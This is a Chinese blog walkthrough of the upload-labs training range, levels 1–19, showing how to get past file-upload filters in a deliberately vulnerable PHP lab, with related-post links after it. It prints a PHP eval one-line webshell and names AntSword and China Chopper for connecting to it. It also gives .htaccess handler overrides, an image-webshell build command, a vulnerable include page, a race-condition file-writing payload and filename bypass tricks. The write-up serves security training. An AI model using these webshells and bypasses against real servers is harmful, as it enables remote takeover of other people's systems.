upload-labs靶场(1-19关)

于 2024-07-27 12:47:28 发布
阅读量668 收藏 9
点赞数 23
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140733806
版权

upload-labs靶场

简介

upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。

注意:能运行<?php phpinfo();?>

就能运行<?php eval($_POST['cmd'])?>一句话木马

为了方便只有第一关用了一句话木马。

Pass-01

思路:第一关限制了长传文件的类型,所以在抓包的时候将图片扩展名改成php扩展名即可

image-20240727084800801

步骤一:写一个1.jpg在里面写php代码

image-20240726114010472

步骤二:BP抓包

image-20240726114234296

步骤三:修改filename改成php扩展名

image-20240726114334395

步骤四:查看网站下上传的文件,文件里写的echo "1"所以显示1

image-20240726114434513

我们如果写一句话木马即可控制他的电脑

<?php @eval($_POST['cmd']);?>

使用工具–蚂蚁,中国菜刀

点击添加

image-20240726115247637

双击

image-20240726115339851

连接成功

image-20240726115329078

Ps:其他关就不用一句话木马了。

Pass-02

思路:查看提示看到是在服务端对数据的MIME进行检查,MIME验证就是验证文件的类型。代码种文件类型只能让jpeg,png,gif传入,所以我们的思路就是用burp抓包然后修改文件的类型。

image-20240727085006288

步骤一:抓包修改内容类型位图片类型

image-20240726135339921

步骤三:访问web下上传的文件

image-20240726135225933

Pass-03

思路:第三关禁用.php,这时候我们就要想办法绕过,说黑名单规则不严谨,可以双写php绕过,改成1.phpphp。

也可以写.php3.php5绕过,但某些环境不支持打开php3文件。

image-20240727085207751

image-20240726135933051

直接上传访问php

image-20240726140826298

Pass-04

思路:这题将.php,.php3…这些都禁用了,双写也绕不过去。我们可以上传.htaccess文件,将jpg文件当作php文件执行。

ps:某些环境不支持,在这里我们找的在线靶场http://47.99.132.71:49153/Pass-04/index.php。

image-20240727085400292

phpinfo.jpg


<FilesMatch 'phpinfo.jpg'>
SetHandler application/x-httpd-php
</FilesMatch>

1.htaccess

<FilesMatch 'phpinfo.jpg'>
SetHandler application/x-httpd-php
</FilesMatch>

image-20240727090642046

Pass-05

思路:这关没有转换大小写的代码。

image-20240726154340796

上传一个5.Php文件,直接上传成功

image-20240727090944088

Pass-06

思路:缺少首尾去空限制,但windows文件名最后不能加空格,可以BP抓包修改

image-20240726154946584

image-20240727092814305

image-20240727092829879

Pass-07

思路:本体没有删除文件末尾的点限制,所以在文件后加个点绕过

image-20240727092921234

BP抓包

image-20240727093124760

image-20240727093103444

Pass-08

思路:缺少去除字符串::$DATA

image-20240727093205511

BP抓包

image-20240727093418007

去除URL中的::$DATA

image-20240727093500378

image-20240727093531647

Pass-09

思路:deldot()函数从后向前检测,当检测到末尾的第一个点时会继续它的检测,但是遇到空格会停下来。

所以我们应该修改文件名为:9.php. .,两个点中间有个空格

image-20240727093812130

BP抓包

image-20240727094021331

image-20240727094034556

Pass-10

思路:本题通过截取文件扩展名,如果截取的扩展名与数组中一样则被拦截。可以通过双写php绕过,写成10.pphphp

image-20240727094243770

image-20240727094541598

Pass-11

思路:本题只允许上传.jpg,.png,.gif,本题考查GET方式%00截断

在处理数据时,当处理到00,就当作处理完成

PHP版本小于5.3

因为实在找不到PHP版本符合的环境,在ctfhub%00截断题目中开了个环境

image-20240727094649216

image-20240727103656440

image-20240727103821123

image-20240727103837677

image-20240727104215475

Pass-12

$_POST['save_path']以POST形式传参时,直接使用%00无法截断,因为POST的数据不会被直接解码,空格会替换成+号,需要手动使用burp中的URL-decode解码。

PHP版本小于5.3

image-20240727104959921

image-20240727105153189

Pass-13

制作一个图片马。

在Windows系统中制作图片马的方法:

(1)随机获得一张图片,这里以如下图片(图片名为cat1.jpg)为例:

猫1

(2)新建一个文本(文本名为cat2.txt),内容为:

<?php phpinfo();?>

注意:cat1.jpg和cat2.txt要在同一个文件目录下。

3)win+r,输入cmd,进入终端,输入如下代码:

cd C:\Users\1\Desktop
copy cat1.jpg/b+cat2.txt/a cat3.jpg

image-20240727110915318

然后需要一个文件包含漏洞

image-20240727111522182

将include.php放到upload文件夹

 <?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

上传做好的图片码,然后在本页面以GET方式提交file=上传至服务端的图片马路径

image-20240727112615781

Pass-14

与Pass-13一样

Pass-15

本pass使用exif_imagetype()检查是否为图片文件!

此Pass需要打开php的exif扩展,否则无法正常交互,关于详细内容,请阅读:PHP exif扩展方法开启详解

image-20240727113235247

其余步骤与Pass-13相同

image-20240727113313217

Pass-16

本pass重新渲染了图片!

需要有一个二次渲染的图片
如下就是一张:
22

图片上传

image-20240727114431566

Pass-17(条件竞争)

提示:需要代码审计!

image-20240727115021145

步骤一:新建一句话木马17.php,代码为:

<?php fputs(fopen('../upload/phpinfo17.php','w'),'<?php phpinfo();?>');?>

只要被成功当作PHP文件解析,就会生成phpinfo17.php 文件

抓包

image-20240727115914769

发送到攻击模块

bp设置无限发送空的Payloads,来让它一直上传该文件

image-20240727120042623

image-20240727121032237

Pass-18

这道题有些问题导致上传的文件传入不进去

在…/upload-labs-env\WWW\Pass-18\myupload.php中修改代码

image-20240727122744637

image-20240727122947328

然后上传一个图片码跟Pass-13一样

image-20240727123647068

Pass-19

空格绕过、点绕过,大小写绕过等等均可。

image-20240727124018471

image-20240727124211821

黑白时光les
关注
  • 23
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手把手教你玩转upload-labs靶场(1--20超详细保姆级)
weixin_52796034的博客
08-23 753
Upload-labs靶场是一个内容全面且开源的PHP文件上传漏洞训练场所。它以真实的文件上传漏洞场景为基础,为安全研究人员和开发人员提供了一个实践和学习的平台。靶场提供了多种不同类型的漏洞场景,涵盖了文件类型绕过、文件名绕过、MIME类型绕过、大小限制绕过等多个方面。每个场景都有详细的解题思路和说明,帮助用户深入理解漏洞的原理和利用方式。通过上传恶意文件,用户可以亲身体验漏洞的利用技巧,并学习如何防范这些漏洞。Upload-labs靶场不仅提供了实践性,还提供了防御机制的实践,帮助用户全面了解如何保护系统
upload-labs靶场1-19
最新发布
qq_70836100的博客
07-27 224
可采用双写绕过,抓包修改后缀为.pphphp,也就是在中间在穿插一个php,这时它过滤掉其中的php后,后缀名依旧为.php。然后我们看源代码可以发现,php不能上传了,那么我们去上传图片码,用第十八同样的方式,只是把.php文件改为图片码。只要上传.php文件就会被删除,那么我们可以在一句话木马被上传之前访问就不会被删除,这个也叫做竞争上传绕过。本为空格绕过,因为windows的特性,我们无法在上传前就创建带空格的1.php文件,因此我们抓包上传。本与第四相似,是上传.user.ini文件。
upload-labs靶场指南(18-19
永远是少年
09-16 984
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场指南(18-19)。 一、第18 二、第19
upload-labs靶场学习笔记1-21
qq_56426046的博客
08-27 1904
服务器端使用白名单防御,修复 web 中间件的漏洞,禁止客户端存在可控参 数,存放文件目录禁止脚本执行,限制后缀名 一定要设置图片格式 jpg、gif 、 png 文件名随机的,不可预测。
upload-labs靶场(1-21)详解全套通
waqqy的博客
12-12 3112
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。
upload-labs靶场安装
剁椒鱼头没剁椒的博客
11-07 5165
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。upload-labs是练习文件上传很好的一个靶场
upload-labs靶场1-19步骤
C233333235的博客
07-26 474
:$DATA然后我们访问时需要将::$DATA删除,就可以正常连接这里的::$DATA的作用是将上传的文件被当作数据流,当网站看到用户上传的只是个数据流,就不会对其加以防护。
文件上传漏洞:upload-labs靶场
qq_68163788的博客
02-16 2719
upload-labs是一个专注于Web安全的在线靶场,旨在帮助安全研究人员和学习者提升对Web安全的理解和技能。该靶场提供了丰富的漏洞场景和挑战,涵盖了常见的Web安全漏洞类型,包括但不限于SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造、文件上传漏洞等。 通过upload-labs,用户可以在真实的环境中进行漏洞挖掘和漏洞利用的实践,学习并掌握各种常见的Web安全攻防技术。靶场提供了丰富的学习资源和提示,帮助用户理解漏洞的原理和挖掘漏洞的方法,同时还提供了实时的漏洞利用演示,帮助用户更好地理解漏洞
upload-labs 靶场练习
Knsec
04-21 3490
靶场简介 个人博客时光机 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20,每一都包含着不同上传方式。 项目地址:https://github.com/c0ny1/upload-labs 本writeup所使用环境为作者所提供的 windows环境一键启动环境。 靶场环境 漏洞简介 文件上传漏洞是由于对上传的文件没有进行合理严格的过滤,导致攻击者上传的文件被服务端解析,导致恶意文件中所包含的恶
upload-labs靶场搭建+题目解答
NSQ0207的博客
07-26 402
在使用NTFS格式的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名。例如:"phpinfo.php::$DATA"Windows会自动去掉末尾的::$DATA变成"phpinfo.php"发送到Repeater,在Hex处寻找61, 将刚刚a处的61,改为00,回车。修改后缀为.php1 .php2 .php3 .php4 .phtml。在该处输入123.phpa.jpg,注意该处输入为a,方便寻找。
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个卡,从基础...
安装upload-labs
10-22
1. 下载靶场文件:首先,您需要下载upload-labs靶场文件,可以从官方网站或其他可靠的渠道下载。 2. 解压到WWW目录下:将下载的靶场文件解压到WWW目录下,请注意不要嵌套文件夹,否则可能会导致安装失败。 3. 启动...
upload-labs19-20以及总结1
08-08
在Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该卡的主要知识点: 1. **文件名...
upload-labs靶场指南
07-02
Upload-labs靶场指南 Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场的通指南,涵盖了从基础的文件上传漏洞到高级...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
07-26
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
b278视频及游戏管理平台-springboot+vue.zip(可运行源码+sql文件+)
07-26
视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。
大模型应用-为Ollma开发的简单的HTML网页UI应用-附项目源码-优质项目实战.zip
07-26
大模型应用_为Ollma开发的简单的HTML网页UI应用_附项目源码_优质项目实战
upload-labs靶场搭建教程
08-19
你可以按照以下步骤来搭建upload-labs靶场: 1. 首先,你可以使用以下命令将upload-labs镜像拉取到本地仓库: docker pull cuer/upload-labs [1] 2. 接下来,你可以在镜像仓库中搜索upload-labs镜像,使用以下命令: docker search upload-labs [2] 3. 除了使用Docker镜像,你还可以在GitHub上找到upload-labs靶场的源代码和相资源。你可以访问以下链接获取更多信息: GitHub链接: https://github.com/Tj1ngwe1/upload-labs [3] 通过上述步骤,你可以拉取upload-labs镜像到本地仓库,并且在GitHub上找到相的源代码和资源来搭建upload-labs靶场。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [upload-labs靶场的安装搭建](https://blog.csdn.net/qq_51331767/article/details/129196926)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值